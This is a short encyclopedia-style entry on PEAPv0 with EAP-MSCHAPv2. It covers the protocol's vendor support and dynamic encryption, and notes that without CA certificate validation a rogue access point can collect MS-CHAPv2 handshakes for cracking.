Protected Extensible Authentication Protocol - PEAPv0 With EAP-MSCHAPv2


PEAPv0/EAP-MSCHAPv2 is the most common form of PEAP in use, and what is usually referred to as PEAP. The inner authentication protocol is Microsoft's Challenge Handshake Authentication Protocol, meaning it allows authentication to databases that support the MS-CHAPv2 format, including Microsoft NT and Microsoft Active Directory.

Behind EAP-TLS, PEAPv0/EAP-MSCHAPv2 is the second most widely supported EAP standard in the world. There are client and server implementations of it from various vendors, including support in all recent releases from Microsoft, Apple Computer and Cisco. Other implementations exist, such as the xsupplicant from the project, and wpa supplicant.

As with other 802.1X and EAP types, dynamic encryption can be used with PEAP.

A CA certificate must be used at each client to authenticate the server to each client before the client submits authentication credentials. If the CA certificate is not validated, in general it is trivial to introduce a fake Wireless Access Point which then allows gathering MS-CHAPv2 of handshakes. On recent hardware those handshakes can be cracked quickly.

Read more about this topic:  Protected Extensible Authentication Protocol